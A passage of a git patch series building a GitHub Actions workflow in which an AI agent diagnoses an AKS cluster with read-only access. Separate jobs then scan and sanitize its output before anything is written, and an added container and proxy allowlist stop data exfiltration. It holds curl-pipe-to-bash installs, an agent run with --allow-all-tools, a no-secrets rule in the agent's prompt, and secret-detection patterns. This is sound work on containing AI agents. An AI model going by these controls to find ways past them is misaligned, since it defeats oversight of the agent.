From 58cec0659b2474d4c75b79fa1d51e485423ff2fd Mon Sep 17 00:00:00 2001 From: Ray Kao Date: Tue, 14 Apr 2026 15:47:54 -0400 Subject: [PATCH 1/7] feat: cluster-doctor with safe-outputs pattern Refactored workflow that splits into three phases: 1. Gather - has Azure OIDC creds, collects K8s diagnostics 2. Analyze - AI agent with read-only perms, produces JSON artifact 3. Apply - validates/sanitizes/applies via safe-outputs-action The agent never holds write tokens or cloud credentials. Uses microsoftgbb/safe-outputs-action@v1 for the output gate. Added as a separate workflow file (.safe-outputs.yml) alongside the original for comparison. The original can be removed once the refactored version is validated. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- ...ot.trigger-cluster-doctor.safe-outputs.yml | 261 ++++++++++++++++++ 1 file changed, 261 insertions(+) create mode 100644 .github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml diff --git a/.github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml b/.github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml new file mode 100644 index 0000000..de01bab --- /dev/null +++ b/.github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml @@ -0,0 +1,261 @@ +name: "Cluster Doctor (Safe Outputs)" + +# Refactored to use the three-phase pattern: +# 1. Parse & Gather (has cloud creds, no AI write access) +# 2. Analyze (AI agent with read-only access, produces safe-outputs JSON) +# 3. Apply (deterministic, validates + sanitizes + applies via safe-outputs-action) +# +# See: https://github.com/microsoftgbb/safe-outputs-action + +on: + workflow_dispatch: + repository_dispatch: + types: [cluster-doctor-trigger] + issues: + types: [labeled, opened] + +permissions: + contents: read + +jobs: + # ────────────────────────────────────────────────────────── + # Phase 1: Parse issue + gather cluster diagnostics + # Has cloud credentials but NO AI agent running here. 
+ # ────────────────────────────────────────────────────────── + gather: + if: | + github.event_name == 'workflow_dispatch' || + github.event_name == 'repository_dispatch' || + github.event.label.name == 'cluster-doctor' || + (github.event.action == 'opened' && contains(github.event.issue.labels.*.name, 'cluster-doctor')) + environment: copilot + runs-on: ubuntu-latest + permissions: + id-token: write # Azure OIDC + contents: read + issues: read + outputs: + issue_number: ${{ steps.get-issue.outputs.issue_number }} + resource_group: ${{ steps.cluster-info.outputs.RESOURCE_GROUP }} + cluster_name: ${{ steps.cluster-info.outputs.CLUSTER_NAME }} + + steps: + - name: Determine issue number + id: get-issue + run: | + if [ "${{ github.event_name }}" = "repository_dispatch" ]; then + echo "issue_number=${{ github.event.client_payload.issue_number }}" >> $GITHUB_OUTPUT + else + echo "issue_number=${{ github.event.issue.number }}" >> $GITHUB_OUTPUT + fi + + - uses: actions/checkout@v5 + with: + fetch-depth: 0 + + - name: Install GitHub Copilot CLI + run: | + curl -fsSL https://gh.io/copilot-install | bash + + - name: Parse cluster info from issue body + id: cluster-info + env: + GITHUB_MCP_TOKEN: ${{ secrets.GITHUB_TOKEN }} + GITHUB_TOKEN: ${{ secrets.COPILOT_CLI_TOKEN }} + run: | + export ISSUE_NUMBER="${{ steps.get-issue.outputs.issue_number }}" + export REPOSITORY="${{ github.repository }}" + PROMPT=$(envsubst < .github/prompts/parse-cluster-info.md) + + COPILOT_OUTPUT=$(copilot -p "$PROMPT" \ + --agent "cluster-doctor" \ + --additional-mcp-config @'.copilot/mcp-config.json' \ + --allow-all-tools 2>&1) + + RESOURCE_GROUP=$(echo "$COPILOT_OUTPUT" | grep -oP 'RESOURCE_GROUP=\K[^\s]+' | head -1) + CLUSTER_NAME=$(echo "$COPILOT_OUTPUT" | grep -oP 'CLUSTER_NAME=\K[^\s]+' | head -1) + + if [ -z "$RESOURCE_GROUP" ] || [ -z "$CLUSTER_NAME" ]; then + echo "ERROR: Could not parse cluster info" + echo "$COPILOT_OUTPUT" + exit 1 + fi + + echo "RESOURCE_GROUP=$RESOURCE_GROUP" >> 
$GITHUB_OUTPUT + echo "CLUSTER_NAME=$CLUSTER_NAME" >> $GITHUB_OUTPUT + + - name: Azure CLI Login + uses: azure/login@v2 + with: + client-id: ${{ secrets.ARM_CLIENT_ID }} + tenant-id: ${{ secrets.ARM_TENANT_ID }} + subscription-id: ${{ secrets.ARM_SUBSCRIPTION_ID }} + + - name: Get AKS credentials + run: | + az aks install-cli + az aks get-credentials \ + --resource-group ${{ steps.cluster-info.outputs.RESOURCE_GROUP }} \ + --name ${{ steps.cluster-info.outputs.CLUSTER_NAME }} \ + --overwrite-existing + + - name: Gather cluster diagnostics + run: | + mkdir -p diagnostics + kubectl get events -A -o json > diagnostics/events.json + kubectl get pods -A -o json > diagnostics/pods.json + kubectl get nodes -o json > diagnostics/nodes.json + kubectl top nodes --no-headers > diagnostics/node-metrics.txt 2>/dev/null || true + kubectl top pods -A --no-headers > diagnostics/pod-metrics.txt 2>/dev/null || true + kubectl get hpa -A -o json > diagnostics/hpa.json 2>/dev/null || true + kubectl get deployments -A -o json > diagnostics/deployments.json + kubectl get services -A -o json > diagnostics/services.json + echo "Diagnostics gathered:" + ls -la diagnostics/ + + - name: Post work started comment + env: + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + gh issue comment ${{ steps.get-issue.outputs.issue_number }} \ + --body "🤖 **Cluster Doctor is on the case!** + + Diagnostics gathered. AI analysis in progress. + + 🔗 [View workflow run](${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }})" + + - uses: actions/upload-artifact@v4 + with: + name: cluster-diagnostics + path: diagnostics/ + retention-days: 1 + + # ────────────────────────────────────────────────────────── + # Phase 2: AI agent analyzes diagnostics + # Read-only permissions. No cloud creds. No GitHub write token. + # Agent produces structured safe-outputs JSON. 
+ # ────────────────────────────────────────────────────────── + analyze: + needs: gather + runs-on: ubuntu-latest + permissions: + contents: read + + steps: + - uses: actions/checkout@v5 + + - uses: actions/download-artifact@v4 + with: + name: cluster-diagnostics + path: diagnostics/ + + - name: Install GitHub Copilot CLI + run: | + curl -fsSL https://gh.io/copilot-install | bash + + - name: AI analysis + env: + GITHUB_TOKEN: ${{ secrets.COPILOT_CLI_TOKEN }} + run: | + ISSUE_NUMBER="${{ needs.gather.outputs.issue_number }}" + CLUSTER_NAME="${{ needs.gather.outputs.cluster_name }}" + RG="${{ needs.gather.outputs.resource_group }}" + + cat > /tmp/analysis-prompt.md << PROMPT + You are the Cluster Doctor analyzing AKS cluster "${CLUSTER_NAME}" in resource group "${RG}". + + Analyze the Kubernetes diagnostics in the diagnostics/ directory. + The files contain JSON exports of cluster state: events, pods, nodes, HPAs, deployments, services, and resource metrics. + + Produce your findings as a JSON file at agent-output.json following this exact schema: + + { + "version": "1", + "actions": [ + { + "type": "issue_comment", + "issue_number": ${ISSUE_NUMBER}, + "body": "## Cluster Doctor Report\n\n" + } + ] + } + + Your analysis should include: + - Cluster health summary (nodes, pods, resource pressure) + - Any issues found (CrashLoopBackOff, OOMKilled, pending pods, etc.) + - Root cause analysis where possible + - Recommended remediation steps + + If you find issues that need code/config changes, add a create_pull_request action: + { + "type": "create_pull_request", + "title": "[cluster-doctor] ", + "body": "", + "head": "cluster-doctor/fix-", + "files": { "path/to/file": "content" } + } + + IMPORTANT: + - Write ONLY the JSON file. No other output. + - Do NOT include any secrets, tokens, or connection strings in your output. + - Use the [cluster-doctor] prefix on all issue and PR titles. 
+ PROMPT + + copilot -p "$(cat /tmp/analysis-prompt.md)" \ + --agent "cluster-doctor" + + # Verify output exists and is valid JSON + if [ ! -f agent-output.json ]; then + echo "ERROR: Agent did not produce agent-output.json" + exit 1 + fi + python3 -c "import json; json.load(open('agent-output.json'))" || { + echo "ERROR: agent-output.json is not valid JSON" + exit 1 + } + echo "Agent output:" + cat agent-output.json | python3 -m json.tool + + - uses: actions/upload-artifact@v4 + with: + name: agent-output + path: agent-output.json + retention-days: 1 + + # ────────────────────────────────────────────────────────── + # Phase 3: Validate, sanitize, and apply agent output + # Has write permissions but NO AI agent running here. + # ────────────────────────────────────────────────────────── + apply: + needs: [gather, analyze] + runs-on: ubuntu-latest + permissions: + issues: write + contents: write + pull-requests: write + + steps: + - uses: actions/download-artifact@v4 + with: + name: agent-output + + - name: Install Copilot CLI (for threat detection) + run: | + curl -fsSL https://gh.io/copilot-install | bash + + - name: Safe Outputs Gate + uses: microsoftgbb/safe-outputs-action@v1 + with: + artifact-path: agent-output.json + max-issues: 0 + max-comments: 2 + max-pull-requests: 1 + title-prefix: "[cluster-doctor] " + allowed-labels: "cluster-doctor,bug,investigation,remediation" + threat-detection: true + custom-secret-patterns: | + 10\.0\.\d+\.\d+ + aks-[a-z0-9]{8,} + DefaultEndpointsProtocol + env: + GITHUB_TOKEN: ${{ secrets.COPILOT_CLI_TOKEN }} From c572d2b7e82bbd0017256d072033a55ee5a85f52 Mon Sep 17 00:00:00 2001 From: Ray Kao Date: Tue, 14 Apr 2026 19:03:14 -0400 Subject: [PATCH 2/7] refactor: give agent read-only cluster access instead of static dumps The previous version gathered diagnostics deterministically and passed static JSON files to the agent - making it a log parser, not a diagnostician. The agent couldn't follow threads. 
Now: the agent runs in the same job as the cluster connection, with read-only access to K8s via AKS MCP and GitHub via GitHub MCP. It can freely explore (check pod logs, inspect HPA config, trace dependency chains) but cannot mutate anything. Security boundary is maintained through: - Scoped RBAC (Azure: Monitoring Reader, K8s: read-only ClusterRole) - No GitHub write token in the agent step - Writes still gated through safe-outputs-action in Phase 2 Two jobs instead of three: 1. Diagnose (cloud creds + agent + read-only MCP access) 2. Apply (write perms + safe-outputs validation, no agent) Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- ...ot.trigger-cluster-doctor.safe-outputs.yml | 202 ++++++++++-------- 1 file changed, 109 insertions(+), 93 deletions(-) diff --git a/.github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml b/.github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml index de01bab..1ece5e7 100644 --- a/.github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml +++ b/.github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml @@ -1,9 +1,14 @@ name: "Cluster Doctor (Safe Outputs)" -# Refactored to use the three-phase pattern: -# 1. Parse & Gather (has cloud creds, no AI write access) -# 2. Analyze (AI agent with read-only access, produces safe-outputs JSON) -# 3. Apply (deterministic, validates + sanitizes + applies via safe-outputs-action) +# Two-phase pattern with read-only agent access: +# 1. Diagnose - Agent has read-only K8s + Azure access via scoped RBAC, +# plus read-only GitHub MCP. Produces safe-outputs JSON artifact. +# 2. Apply - Deterministic job validates, sanitizes, and applies the +# agent's proposed actions via safe-outputs-action. +# +# The agent can freely explore the cluster (follow threads, check logs, +# inspect resources) but cannot mutate anything. All writes go through +# the gated apply phase. 
# # See: https://github.com/microsoftgbb/safe-outputs-action @@ -19,10 +24,21 @@ permissions: jobs: # ────────────────────────────────────────────────────────── - # Phase 1: Parse issue + gather cluster diagnostics - # Has cloud credentials but NO AI agent running here. + # Phase 1: Diagnose + # + # The agent gets: + # - Read-only K8s access (scoped ClusterRole via AKS MCP server) + # - Read-only Azure access (OIDC, scoped to Monitoring Reader) + # - Read-only GitHub MCP (can read issues, not write them) + # - No GitHub write token + # + # The agent can follow threads freely - check pod logs when it + # sees OOMKills, inspect HPA config when it sees scaling issues, + # look at node allocatable when it sees pending pods, etc. + # + # Output: structured safe-outputs JSON artifact # ────────────────────────────────────────────────────────── - gather: + diagnose: if: | github.event_name == 'workflow_dispatch' || github.event_name == 'repository_dispatch' || @@ -31,13 +47,11 @@ jobs: environment: copilot runs-on: ubuntu-latest permissions: - id-token: write # Azure OIDC + id-token: write # Azure OIDC (scoped to read-only role) contents: read - issues: read + issues: read # Read issues for context, not write outputs: issue_number: ${{ steps.get-issue.outputs.issue_number }} - resource_group: ${{ steps.cluster-info.outputs.RESOURCE_GROUP }} - cluster_name: ${{ steps.cluster-info.outputs.CLUSTER_NAME }} steps: - name: Determine issue number @@ -84,6 +98,20 @@ jobs: echo "RESOURCE_GROUP=$RESOURCE_GROUP" >> $GITHUB_OUTPUT echo "CLUSTER_NAME=$CLUSTER_NAME" >> $GITHUB_OUTPUT + # ── Establish read-only cluster access ── + # + # The Azure identity used here should be scoped to: + # - Azure Kubernetes Service Cluster User Role (read-only) + # - Monitoring Reader (for metrics) + # + # The AKS MCP server should use a K8s ClusterRole scoped to: + # - pods, events, nodes, services, deployments: get, list + # - pods/log: get + # - NO secrets, NO configmaps (or namespace-scoped) + # - 
NO create, update, delete, patch verbs + # + # See README for the recommended ClusterRole definition. + - name: Azure CLI Login uses: azure/login@v2 with: @@ -91,7 +119,7 @@ jobs: tenant-id: ${{ secrets.ARM_TENANT_ID }} subscription-id: ${{ secrets.ARM_SUBSCRIPTION_ID }} - - name: Get AKS credentials + - name: Connect to AKS cluster run: | az aks install-cli az aks get-credentials \ @@ -99,19 +127,13 @@ jobs: --name ${{ steps.cluster-info.outputs.CLUSTER_NAME }} \ --overwrite-existing - - name: Gather cluster diagnostics - run: | - mkdir -p diagnostics - kubectl get events -A -o json > diagnostics/events.json - kubectl get pods -A -o json > diagnostics/pods.json - kubectl get nodes -o json > diagnostics/nodes.json - kubectl top nodes --no-headers > diagnostics/node-metrics.txt 2>/dev/null || true - kubectl top pods -A --no-headers > diagnostics/pod-metrics.txt 2>/dev/null || true - kubectl get hpa -A -o json > diagnostics/hpa.json 2>/dev/null || true - kubectl get deployments -A -o json > diagnostics/deployments.json - kubectl get services -A -o json > diagnostics/services.json - echo "Diagnostics gathered:" - ls -la diagnostics/ + echo "Verifying cluster access..." + kubectl cluster-info + + # Start port-forward to AKS MCP server + # The MCP server provides read-only K8s access to the agent + kubectl port-forward -n aks-mcp svc/aks-mcp 8000:8000 & + sleep 3 - name: Post work started comment env: @@ -120,91 +142,84 @@ jobs: gh issue comment ${{ steps.get-issue.outputs.issue_number }} \ --body "🤖 **Cluster Doctor is on the case!** - Diagnostics gathered. AI analysis in progress. + Connected to cluster. AI diagnosis in progress - the agent is + exploring the cluster to identify and trace issues. 
🔗 [View workflow run](${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }})" - - uses: actions/upload-artifact@v4 - with: - name: cluster-diagnostics - path: diagnostics/ - retention-days: 1 - - # ────────────────────────────────────────────────────────── - # Phase 2: AI agent analyzes diagnostics - # Read-only permissions. No cloud creds. No GitHub write token. - # Agent produces structured safe-outputs JSON. - # ────────────────────────────────────────────────────────── - analyze: - needs: gather - runs-on: ubuntu-latest - permissions: - contents: read - - steps: - - uses: actions/checkout@v5 - - - uses: actions/download-artifact@v4 - with: - name: cluster-diagnostics - path: diagnostics/ - - - name: Install GitHub Copilot CLI - run: | - curl -fsSL https://gh.io/copilot-install | bash - - - name: AI analysis + # ── Agent runs with read-only access ── + # + # The agent can freely: + # - Query any K8s resource via AKS MCP (read-only) + # - Read issue context via GitHub MCP (read-only) + # - Follow diagnostic threads (logs, events, resource chains) + # + # The agent CANNOT: + # - Write to GitHub (no write token provided) + # - Mutate K8s resources (read-only ClusterRole) + # - Access secrets (excluded from ClusterRole) + # - Reach external networks (if network policy is applied) + + - name: AI diagnosis env: + GITHUB_MCP_TOKEN: ${{ secrets.GITHUB_TOKEN }} GITHUB_TOKEN: ${{ secrets.COPILOT_CLI_TOKEN }} run: | - ISSUE_NUMBER="${{ needs.gather.outputs.issue_number }}" - CLUSTER_NAME="${{ needs.gather.outputs.cluster_name }}" - RG="${{ needs.gather.outputs.resource_group }}" + ISSUE_NUMBER="${{ steps.get-issue.outputs.issue_number }}" + CLUSTER_NAME="${{ steps.cluster-info.outputs.CLUSTER_NAME }}" + RG="${{ steps.cluster-info.outputs.RESOURCE_GROUP }}" - cat > /tmp/analysis-prompt.md << PROMPT - You are the Cluster Doctor analyzing AKS cluster "${CLUSTER_NAME}" in resource group "${RG}". 
+ export PROMPT="You are the Cluster Doctor diagnosing AKS cluster '${CLUSTER_NAME}' in resource group '${RG}'. - Analyze the Kubernetes diagnostics in the diagnostics/ directory. - The files contain JSON exports of cluster state: events, pods, nodes, HPAs, deployments, services, and resource metrics. + Use the AKS MCP server to explore the cluster. You have read-only access to all Kubernetes resources. + Use the GitHub MCP server to read issue #${ISSUE_NUMBER} in ${{ github.repository }} for context. - Produce your findings as a JSON file at agent-output.json following this exact schema: + INVESTIGATE FREELY: + - Start broad (cluster health, node status, pod states) + - Follow threads when you find issues (e.g., OOMKilled -> check resource limits -> check HPA -> check node capacity) + - Check pod logs for crash details + - Trace the dependency chain (service -> deployment -> pods -> events) + - Look at recent events for warning patterns + + When your investigation is complete, produce your findings as a JSON file at agent-output.json following this schema: { - "version": "1", - "actions": [ + \"version\": \"1\", + \"actions\": [ { - "type": "issue_comment", - "issue_number": ${ISSUE_NUMBER}, - "body": "## Cluster Doctor Report\n\n" + \"type\": \"issue_comment\", + \"issue_number\": ${ISSUE_NUMBER}, + \"body\": \"## Cluster Doctor Report\n\n\" } ] } - Your analysis should include: - - Cluster health summary (nodes, pods, resource pressure) - - Any issues found (CrashLoopBackOff, OOMKilled, pending pods, etc.) 
- - Root cause analysis where possible - - Recommended remediation steps + Your report should include: + - Investigation path (what you checked and why) + - Findings with evidence (specific pods, events, metrics) + - Root cause analysis + - Recommended remediation steps with specific commands or config changes - If you find issues that need code/config changes, add a create_pull_request action: + If you identify config/code changes, add a create_pull_request action: { - "type": "create_pull_request", - "title": "[cluster-doctor] ", - "body": "", - "head": "cluster-doctor/fix-", - "files": { "path/to/file": "content" } + \"type\": \"create_pull_request\", + \"title\": \"[cluster-doctor] \", + \"body\": \"\", + \"head\": \"cluster-doctor/fix-\", + \"files\": { \"path/to/file\": \"full file content\" } } - IMPORTANT: - - Write ONLY the JSON file. No other output. - - Do NOT include any secrets, tokens, or connection strings in your output. - - Use the [cluster-doctor] prefix on all issue and PR titles. - PROMPT + RULES: + - Write ONLY the agent-output.json file. No other files. + - Do NOT include secrets, tokens, connection strings, or internal IPs in your output. + - Use [cluster-doctor] prefix on all titles." - copilot -p "$(cat /tmp/analysis-prompt.md)" \ - --agent "cluster-doctor" + copilot -p "$PROMPT" \ + --agent "cluster-doctor" \ + --additional-mcp-config @'.copilot/mcp-config.json' \ + --allow-all-tools - # Verify output exists and is valid JSON + # Validate output if [ ! 
-f agent-output.json ]; then echo "ERROR: Agent did not produce agent-output.json" exit 1 @@ -213,8 +228,7 @@ jobs: echo "ERROR: agent-output.json is not valid JSON" exit 1 } - echo "Agent output:" - cat agent-output.json | python3 -m json.tool + echo "Agent output produced successfully" - uses: actions/upload-artifact@v4 with: @@ -223,11 +237,13 @@ jobs: retention-days: 1 # ────────────────────────────────────────────────────────── - # Phase 3: Validate, sanitize, and apply agent output - # Has write permissions but NO AI agent running here. + # Phase 2: Validate, sanitize, and apply + # + # No AI agent. No cluster access. No cloud creds. + # Mechanically applies the validated, sanitized output. # ────────────────────────────────────────────────────────── apply: - needs: [gather, analyze] + needs: diagnose runs-on: ubuntu-latest permissions: issues: write From b5fc123ff49ca0e782a2df5715d18af38023b47c Mon Sep 17 00:00:00 2001 From: Ray Kao Date: Tue, 14 Apr 2026 19:24:40 -0400 Subject: [PATCH 3/7] refactor: 3-job pipeline - diagnose / scan / apply Separates concerns cleanly across three jobs: 1. Diagnose - agent has live read-only cluster + GitHub MCP access, can follow diagnostic threads freely, produces JSON artifact 2. Scan - validates constraints, sanitizes secrets, runs AI threat detection via Copilot CLI. Dry-run mode: blocks if anything fails but does not write. No creds of any kind. 3. Apply - has GitHub write token only. Mechanically applies the validated, sanitized output. No agent, no cluster creds. Each job has exactly one concern and minimum permissions. The scan job acts as a circuit breaker between diagnosis and action. 
Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- ...ot.trigger-cluster-doctor.safe-outputs.yml | 158 +++++++++--------- 1 file changed, 76 insertions(+), 82 deletions(-) diff --git a/.github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml b/.github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml index 1ece5e7..af91ba3 100644 --- a/.github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml +++ b/.github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml @@ -1,14 +1,11 @@ name: "Cluster Doctor (Safe Outputs)" -# Two-phase pattern with read-only agent access: -# 1. Diagnose - Agent has read-only K8s + Azure access via scoped RBAC, -# plus read-only GitHub MCP. Produces safe-outputs JSON artifact. -# 2. Apply - Deterministic job validates, sanitizes, and applies the -# agent's proposed actions via safe-outputs-action. +# Three-phase pattern: +# 1. Diagnose - Agent explores cluster freely (read-only K8s + GitHub MCP) +# 2. Scan - Validate constraints, sanitize secrets, AI threat detection +# 3. Apply - Deterministic write to GitHub (issues, PRs) # -# The agent can freely explore the cluster (follow threads, check logs, -# inspect resources) but cannot mutate anything. All writes go through -# the gated apply phase. +# Each job has exactly one concern and the minimum permissions for it. 
# # See: https://github.com/microsoftgbb/safe-outputs-action @@ -24,19 +21,14 @@ permissions: jobs: # ────────────────────────────────────────────────────────── - # Phase 1: Diagnose + # Job 1: Diagnose # - # The agent gets: - # - Read-only K8s access (scoped ClusterRole via AKS MCP server) - # - Read-only Azure access (OIDC, scoped to Monitoring Reader) - # - Read-only GitHub MCP (can read issues, not write them) - # - No GitHub write token + # Has: Azure OIDC (read-only), K8s MCP (read-only), GitHub MCP (read-only) + # Does NOT have: GitHub write token # - # The agent can follow threads freely - check pod logs when it - # sees OOMKills, inspect HPA config when it sees scaling issues, - # look at node allocatable when it sees pending pods, etc. - # - # Output: structured safe-outputs JSON artifact + # The agent can freely explore the cluster - check pod logs, + # inspect HPA config, trace dependency chains, etc. + # Produces a structured safe-outputs JSON artifact. # ────────────────────────────────────────────────────────── diagnose: if: | @@ -49,7 +41,7 @@ jobs: permissions: id-token: write # Azure OIDC (scoped to read-only role) contents: read - issues: read # Read issues for context, not write + issues: read outputs: issue_number: ${{ steps.get-issue.outputs.issue_number }} @@ -98,20 +90,6 @@ jobs: echo "RESOURCE_GROUP=$RESOURCE_GROUP" >> $GITHUB_OUTPUT echo "CLUSTER_NAME=$CLUSTER_NAME" >> $GITHUB_OUTPUT - # ── Establish read-only cluster access ── - # - # The Azure identity used here should be scoped to: - # - Azure Kubernetes Service Cluster User Role (read-only) - # - Monitoring Reader (for metrics) - # - # The AKS MCP server should use a K8s ClusterRole scoped to: - # - pods, events, nodes, services, deployments: get, list - # - pods/log: get - # - NO secrets, NO configmaps (or namespace-scoped) - # - NO create, update, delete, patch verbs - # - # See README for the recommended ClusterRole definition. 
- - name: Azure CLI Login uses: azure/login@v2 with: @@ -126,39 +104,21 @@ jobs: --resource-group ${{ steps.cluster-info.outputs.RESOURCE_GROUP }} \ --name ${{ steps.cluster-info.outputs.CLUSTER_NAME }} \ --overwrite-existing - - echo "Verifying cluster access..." kubectl cluster-info - - # Start port-forward to AKS MCP server - # The MCP server provides read-only K8s access to the agent kubectl port-forward -n aks-mcp svc/aks-mcp 8000:8000 & sleep 3 - - name: Post work started comment - env: - GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} - run: | - gh issue comment ${{ steps.get-issue.outputs.issue_number }} \ - --body "🤖 **Cluster Doctor is on the case!** - - Connected to cluster. AI diagnosis in progress - the agent is - exploring the cluster to identify and trace issues. - - 🔗 [View workflow run](${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }})" - - # ── Agent runs with read-only access ── + # ── Agent explores the cluster freely ── # - # The agent can freely: - # - Query any K8s resource via AKS MCP (read-only) - # - Read issue context via GitHub MCP (read-only) - # - Follow diagnostic threads (logs, events, resource chains) + # CAN: query K8s resources, read pod logs, check events, read issue context + # CANNOT: write to GitHub, mutate K8s, access K8s secrets, reach external networks # - # The agent CANNOT: - # - Write to GitHub (no write token provided) - # - Mutate K8s resources (read-only ClusterRole) - # - Access secrets (excluded from ClusterRole) - # - Reach external networks (if network policy is applied) + # Recommended K8s ClusterRole for the AKS MCP service account: + # pods, events, nodes, services, namespaces: get, list + # pods/log: get + # deployments, replicasets, daemonsets, statefulsets: get, list + # horizontalpodautoscalers: get, list + # NO secrets, NO configmaps (or namespace-scoped), NO write verbs - name: AI diagnosis env: @@ -189,18 +149,12 @@ jobs: { \"type\": \"issue_comment\", \"issue_number\": 
${ISSUE_NUMBER}, - \"body\": \"## Cluster Doctor Report\n\n\" + \"body\": \"## Cluster Doctor Report\n\n\" } ] } - Your report should include: - - Investigation path (what you checked and why) - - Findings with evidence (specific pods, events, metrics) - - Root cause analysis - - Recommended remediation steps with specific commands or config changes - - If you identify config/code changes, add a create_pull_request action: + If you identify config/code changes that would fix the issue, add a create_pull_request action: { \"type\": \"create_pull_request\", \"title\": \"[cluster-doctor] \", @@ -210,16 +164,15 @@ jobs: } RULES: - - Write ONLY the agent-output.json file. No other files. - - Do NOT include secrets, tokens, connection strings, or internal IPs in your output. - - Use [cluster-doctor] prefix on all titles." + - Write ONLY the agent-output.json file + - Do NOT include secrets, tokens, connection strings, or internal IPs in your output + - Use [cluster-doctor] prefix on all titles" copilot -p "$PROMPT" \ --agent "cluster-doctor" \ --additional-mcp-config @'.copilot/mcp-config.json' \ --allow-all-tools - # Validate output if [ ! -f agent-output.json ]; then echo "ERROR: Agent did not produce agent-output.json" exit 1 @@ -228,7 +181,6 @@ jobs: echo "ERROR: agent-output.json is not valid JSON" exit 1 } - echo "Agent output produced successfully" - uses: actions/upload-artifact@v4 with: @@ -237,18 +189,19 @@ jobs: retention-days: 1 # ────────────────────────────────────────────────────────── - # Phase 2: Validate, sanitize, and apply + # Job 2: Scan # - # No AI agent. No cluster access. No cloud creds. - # Mechanically applies the validated, sanitized output. + # Has: nothing - no cloud creds, no write tokens, no cluster access + # Just the agent's output artifact and the safe-outputs validator. + # + # Validates constraints, sanitizes secrets, runs AI threat detection. + # If anything fails, the workflow stops here - nothing gets written. 
# ────────────────────────────────────────────────────────── - apply: + scan: needs: diagnose runs-on: ubuntu-latest permissions: - issues: write - contents: write - pull-requests: write + contents: read steps: - uses: actions/download-artifact@v4 @@ -259,7 +212,7 @@ jobs: run: | curl -fsSL https://gh.io/copilot-install | bash - - name: Safe Outputs Gate + - name: Validate, sanitize, and scan uses: microsoftgbb/safe-outputs-action@v1 with: artifact-path: agent-output.json @@ -269,9 +222,50 @@ jobs: title-prefix: "[cluster-doctor] " allowed-labels: "cluster-doctor,bug,investigation,remediation" threat-detection: true + dry-run: true custom-secret-patterns: | 10\.0\.\d+\.\d+ aks-[a-z0-9]{8,} DefaultEndpointsProtocol env: GITHUB_TOKEN: ${{ secrets.COPILOT_CLI_TOKEN }} + + # Re-upload the (potentially sanitized) output for the apply job + - uses: actions/upload-artifact@v4 + with: + name: scanned-output + path: agent-output.json + retention-days: 1 + overwrite: true + + # ────────────────────────────────────────────────────────── + # Job 3: Apply + # + # Has: GitHub write token (issues, contents, pull-requests) + # Does NOT have: AI agent, cloud creds, cluster access + # + # Mechanically applies the validated, sanitized output. + # No decisions made here - just execution. 
+ # ────────────────────────────────────────────────────────── + apply: + needs: [diagnose, scan] + runs-on: ubuntu-latest + permissions: + issues: write + contents: write + pull-requests: write + + steps: + - uses: actions/download-artifact@v4 + with: + name: scanned-output + + - name: Apply safe outputs + uses: microsoftgbb/safe-outputs-action@v1 + with: + artifact-path: agent-output.json + max-issues: 0 + max-comments: 2 + max-pull-requests: 1 + title-prefix: "[cluster-doctor] " + allowed-labels: "cluster-doctor,bug,investigation,remediation" From fe7efe577fabe26be04552e1f273283a38a1f413 Mon Sep 17 00:00:00 2001 From: Ray Kao Date: Tue, 14 Apr 2026 20:24:53 -0400 Subject: [PATCH 4/7] feat: container isolation + network firewall for agent Defense-in-depth matching gh-aw's Agent Workflow Firewall pattern: 1. Agent runs inside a Docker container (not on bare runner) 2. Container sits on an internal Docker network (--internal) 3. All HTTP/HTTPS traffic routes through a Squid proxy 4. Proxy enforces a domain allowlist: - api.githubcopilot.com (model API) - api.github.com (GitHub MCP) - *.azmk8s.io (K8s API for port-forward) - login.microsoftonline.com (Azure AD) - management.azure.com (Azure ARM) - (injected dynamically) 5. Everything else is blocked at the network level 6. Proxy access log provides full audit trail Scoped credentials are still passed to the container (read-only K8s RBAC, read-only Azure roles) because the agent needs them to do its job. The firewall prevents exfiltration of data the agent reads to unauthorized destinations. 
New files: - .github/containers/agent/Dockerfile (Copilot CLI + kubectl) - .github/containers/proxy/squid.conf (domain allowlist) - .github/scripts/run-sandboxed-agent.sh (orchestrates containers) Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/containers/agent/Dockerfile | 36 ++++ .github/containers/proxy/squid.conf | 43 +++++ .github/scripts/run-sandboxed-agent.sh | 136 +++++++++++++++ ...ot.trigger-cluster-doctor.safe-outputs.yml | 158 ++++++++++-------- 4 files changed, 301 insertions(+), 72 deletions(-) create mode 100644 .github/containers/agent/Dockerfile create mode 100644 .github/containers/proxy/squid.conf create mode 100755 .github/scripts/run-sandboxed-agent.sh diff --git a/.github/containers/agent/Dockerfile b/.github/containers/agent/Dockerfile new file mode 100644 index 0000000..cc00b74 --- /dev/null +++ b/.github/containers/agent/Dockerfile @@ -0,0 +1,36 @@ +FROM ubuntu:24.04 + +# Avoid interactive prompts +ENV DEBIAN_FRONTEND=noninteractive + +RUN apt-get update && apt-get install -y --no-install-recommends \ + ca-certificates \ + curl \ + jq \ + python3 \ + apt-transport-https \ + gnupg \ + && rm -rf /var/lib/apt/lists/* + +# Install kubectl +RUN curl -fsSL https://pkgs.k8s.io/core:/stable:/v1.31/deb/Release.key | gpg --dearmor -o /etc/apt/keyrings/kubernetes-apt-keyring.gpg \ + && echo 'deb [signed-by=/etc/apt/keyrings/kubernetes-apt-keyring.gpg] https://pkgs.k8s.io/core:/stable:/v1.31/deb/ /' > /etc/apt/sources.list.d/kubernetes.list \ + && apt-get update && apt-get install -y kubectl \ + && rm -rf 